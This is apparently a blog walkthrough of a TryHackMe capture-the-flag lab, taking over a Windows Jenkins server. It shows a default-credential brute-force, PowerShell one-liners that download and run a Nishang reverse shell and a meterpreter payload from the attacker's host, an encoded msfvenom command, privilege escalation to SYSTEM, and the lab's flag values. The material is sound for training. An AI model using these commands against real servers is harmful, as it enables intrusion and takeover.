In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY/SYSTEM, which is the equivalent of
root on a Windows machine.
⚔️ Challenge: I need to capture two “flags”, the
user.txt flag and the
root.txt flag. Let’s get started!
First, we’ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.
IPs export myIP=10.6.2.23 export targetIP=10.10.99.176 ┌──(tester㉿box)-[~/THM] └─$ nmap 10.10.216.90 -Pn Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST Nmap scan report for 10.10.216.90 Host is up (0.083s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
We see that there are three open ports.
There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment on our browser.
ms-wbt-server running on port 3389 looks interesting. A quick google search reveals that it has something to do with the RDP (remote desktop protocol).
http-proxy on 8080 looks intriguing. On port 80 we find a picture of batman in plainclothes. There’s not much here to see. A quick look at the source HTML code doesn’t reveal anything else interesting.
HACKING JENKINS WITH BURPSUITE
On port 8080, we find a login page to Jenkins.
Let’s take a few guesses with some of the standard factory-set passwords:
Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack.
Based on the different lengths of the responses, we can see that
admin:admin may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with
At TryHackMe’s suggestion, we’ll use Nishang for spawning a
revshell from windows. Inside the Jenkins admin dashboard, we can click on project 1 and then edit configure.
In the last text box, we can perform remote command execution.
USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD
First, let’s spawn a reverse shell using
PowerShellTcp.ps1 from nishang’s git repo. After downloading the file from the git repo, we launch a Netcat listener with the command:
nc -lnvp 8888
Then we use the following command in the last text box on Jenkins project 1 settings.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1'>
After clicking on “
build” in the Jenkin’s dashboard, we catch the shell on our Netcat listener and discover the
!!! user.txt: 79007a09481963edf2e1321abd9ae2a0 !!!
USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD
We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:
sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe
Now we need to start up Metasploit console:
Load the meterpreter exploit/multi/handler:
Set up our payload:
set payload windows/meterpreter/reverse_tcp payload
And finally, type:
First, we’ll spin up a simple HTTP server to copy
shell.exe to windows with:
python -m http.server 8000
Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.6.2.23:8000/shell.exe','shell.exe')"
And Metasploit successfully launches a new meterpreter session on the target box. If the
shell.exe file is grabbed successfully from the HTTP server (code 200), but no meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:
PRIVILEGE ESCALATION TO ROOT
First, we issue the following command in our meterpreter to automatically escalate to the highest privilege possible:
We now operate with NT AUTHORITY/SYSTEM privileges for most things, but not every single command. To fix this, we can migrate to another process on the target machine.
Entering the command “
ps” will give us a list of processes. We’ll use the process
system.exe with the following command:
migrate <PID> (process id of the target process running by NT AUTHORITY/SYSTEM, in this case
Now we are running metasploit in the RAM of our target machine on the
system.exe process. We have full NT AUTHORITY/SYSTEM privileges and can easily find
root.txt with the following command:
find -f root.txt cat root.txt ��dff0f748678f280250f25a45b8046b4a
Thanks for reading/watching my walkthrough. 🙏
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.